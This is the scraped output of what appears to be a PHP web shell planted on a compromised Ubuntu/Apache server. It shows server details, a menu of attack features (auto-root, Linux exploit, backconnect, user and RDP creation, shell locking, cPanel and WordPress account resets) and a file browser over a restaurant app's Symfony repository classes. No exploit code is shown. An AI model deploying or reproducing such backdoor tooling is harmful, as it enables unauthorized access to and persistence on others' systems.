Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
src /
Repository /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
ActivityRepository.php
1.35
KB
-rw-rw-r--
CustomerRepository.php
1.35
KB
-rw-rw-r--
GroupsRepository.php
229
B
-rw-rw-r--
InventoryRepository.php
235
B
-rw-rw-r--
ItemPartRepository.php
1.9
KB
-rw-rw-r--
ItemRepository.php
648
B
-rw-rw-r--
OrderItemRepository.php
2.43
KB
-rw-rw-r--
OrdersRepository.php
5.33
KB
-rw-rw-r--
PlaceRepository.php
805
B
-rw-rw-r--
StockRepository.php
1.15
KB
-rw-rw-r--
SubscriptionRepository.php
1.39
KB
-rw-rw-r--
SupplierRepository.php
233
B
-rw-rw-r--
SupplyItemRepository.php
4.89
KB
-rw-rw-r--
SupplyRepository.php
655
B
-rw-rw-r--
TransactionRepository.php
1.38
KB
-rw-rw-r--
UsersRepository.php
1.32
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ActivityRepository.php
<?php namespace App\Repository; use App\Entity\Activity; use Doctrine\Bundle\DoctrineBundle\Repository\ServiceEntityRepository; use Symfony\Bridge\Doctrine\RegistryInterface; /** * @method Activity|null find($id, $lockMode = null, $lockVersion = null) * @method Activity|null findOneBy(array $criteria, array $orderBy = null) * @method Activity[] findAll() * @method Activity[] findBy(array $criteria, array $orderBy = null, $limit = null, $offset = null) */ class ActivityRepository extends ServiceEntityRepository { public function __construct(RegistryInterface $registry) { parent::__construct($registry, Activity::class); } // /** // * @return Activity[] Returns an array of Activity objects // */ /* public function findByExampleField($value) { return $this->createQueryBuilder('a') ->andWhere('a.exampleField = :val') ->setParameter('val', $value) ->orderBy('a.id', 'ASC') ->setMaxResults(10) ->getQuery() ->getResult() ; } */ /* public function findOneBySomeField($value): ?Activity { return $this->createQueryBuilder('a') ->andWhere('a.exampleField = :val') ->setParameter('val', $value) ->getQuery() ->getOneOrNullResult() ; } */ }
Close